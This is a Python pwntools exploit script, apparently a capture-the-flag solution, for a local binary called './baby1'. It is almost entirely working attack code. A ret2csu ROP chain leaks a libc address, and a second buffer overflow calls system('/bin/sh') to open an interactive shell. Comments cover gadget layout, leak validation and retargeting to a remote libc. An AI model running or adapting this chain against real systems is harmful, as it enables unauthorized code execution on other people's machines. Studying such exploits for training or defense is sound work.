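# ret2csu exploit for ./baby1 (x86-64, non-PIE assumed: the gadgets below are
# absolute 0x4006xx text addresses).  Stage 1 leaks write@GLIBC through the
# __libc_csu_init gadget pair and returns to main; stage 2 is a plain
# pop rdi; ret -> system("/bin/sh").  Byte literals and next() keep the script
# runnable under both the Python 2 and Python 3 builds of pwntools.

# Gadgets recovered from the binary by the original author (not re-derived here).
POP_RDI_RET = 0x4006c3     # pop rdi; ret -- inferred from its use in stage 2; confirm with ROPgadget
CSU_POP = 0x4006B6         # __libc_csu_init epilogue: add rsp, 8; pop rbx..r15; ret (assumed layout)
CSU_CALL = 0x4006A0        # __libc_csu_init loop body: mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]
OVERFLOW_PADDING = 56      # bytes from the start of the buffer to the saved return address (from the original)


def csu_call_words(csu_pop, csu_call, func_got, rdi, rsi, rdx, ret_to):
    """Return the stack qwords for one ret2csu call ``*func_got(rdi, rsi, rdx)``.

    The chain returns to ``ret_to`` after the call completes.  Register
    mapping assumed for the gadget pair (standard __libc_csu_init layout):
    r13 -> rdx, r14 -> rsi, r15d -> edi, call [r12 + rbx*8].
    """
    return [
        csu_pop,
        0x4141414141414141,   # b"A"*8: discarded by the `add rsp, 8` that precedes the pops
        0,                    # rbx = 0  -> call [r12 + 0]
        1,                    # rbp = 1  -> rbx+1 == rbp, so the loop exits after one call
        func_got,             # r12 = GOT slot holding the function pointer
        rdx,                  # r13 -> rdx
        rsi,                  # r14 -> rsi
        rdi,                  # r15 -> edi
        csu_call,
        0,                    # eaten by `add rsp, 8` after the loop
        0, 0, 0, 0, 0, 0,     # rbx, rbp, r12, r13, r14, r15 (don't care)
        ret_to,
    ]


def main():
    """Run the two-stage exploit against a local ./baby1 and drop to a shell."""
    r = process('./baby1')
    e = ELF('./baby1', checksec=False)
    # e.libc is the libc the *local* loader maps for this binary.  Against a
    # remote target load that target's libc (ELF('libc.so.6')) instead, or
    # every offset below is wrong.
    libc = e.libc

    main_addr = e.symbols['main']
    write_got = e.got['write']

    # Stage 1: write(1, &write@got, 8) via ret2csu, then back to main so the
    # buffer can be overflowed a second time.
    words = csu_call_words(CSU_POP, CSU_CALL, write_got,
                           rdi=1, rsi=write_got, rdx=8, ret_to=main_addr)
    stage1 = b"A" * OVERFLOW_PADDING + b"".join(p64(w) for w in words)
    r.recvline()                # banner/prompt line printed before the first read
    r.sendline(stage1)

    # write() emits exactly 8 bytes; recvn() waits for all of them instead of
    # trusting one recv() call to hand back the first 6.
    leaked = u64(r.recvn(8))
    libc_base = leaked - libc.symbols['write']
    # libc is mmap'ed page-aligned; anything else means the leak or the libc
    # offsets are wrong -- fail here rather than inside system().
    if libc_base & 0xfff:
        raise RuntimeError("bad leak %#x: libc base %#x is not page-aligned" % (leaked, libc_base))
    system_addr = libc_base + libc.symbols['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh'))

    # Stage 2: pop rdi; ret -> system("/bin/sh").  If system() faults on a
    # movaps (stack misaligned by 8 on newer glibc), insert a lone `ret`
    # gadget before system_addr.
    stage2 = b"A" * OVERFLOW_PADDING + b"".join(
        p64(w) for w in (POP_RDI_RET, binsh_addr, system_addr))
    r.sendlineafter(b"\n", stage2)
    r.interactive()


if __name__ == "__main__":
    main()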